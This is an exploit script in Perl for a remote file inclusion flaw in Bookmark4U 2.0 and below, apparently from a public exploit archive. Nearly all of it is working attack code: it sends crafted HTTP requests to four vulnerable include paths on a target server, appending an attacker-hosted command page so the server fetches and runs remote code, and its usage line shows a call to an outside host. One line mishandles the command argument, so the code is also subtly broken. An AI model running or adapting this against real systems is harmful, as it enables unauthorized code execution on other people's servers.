Bookmark4U versions 2.0 and below remote file inclusion exploit.
058e3fcd3f73b98b6c6acbdb9666aff13dd25b3ed9cfb80ac6696b671de40384
#!/usr/bin/perl
# Bookmark4U Multiple Remote File Include
#
# perl bm4u.pl <remote_addr> <remote_port> <remote_path> <cracked_page_cmd>
# Federico Fazzi <federico@autistici.org>
use IO::Socket;
if(@ARGV < 4) { &usage; }
my ($host, $port, $path, $cmd, $count);
my @includers = ("inc/dbase.php?env[include_prefix]=",
"inc/config.php?env[include_prefix]=",
"inc/common.php?env[include_prefix]=",
"inc/function.php?env[include_prefix]=");
# hostname target
$host = $ARGV[0];
# port of hostname target
$port = $ARGV[1];
# path of bookmark4u
$path = $ARGV[2];
# url of cracker_cmd
$cmd = chomp($ARGV[3]);
for($count = 0; $count <=$#includers; $count++) {
$socket = IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>"http($port)", Proto=>'tcp', Timeout=>'2');
if($socket) {
print "\ntry $path$includers[$count] string!\n";
print $socket "GET ".$path."$includers[$count]".$cmd." HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
print "sending request string.. done!\n\n";
if(<$socket>) {
print <$socket>;
}
close($socket);
}
}
sub usage {
print "Bookmark4U Multiple Remote File Include\n";
print "\$ perl bm4u.pl 192.168.0.1 80 /[bookmark4u_path/
http://example/cmd.php?&cmd=uname\n";
print "Federico Fazzi <federico@autistici.org>\n\n";
exit(1);
}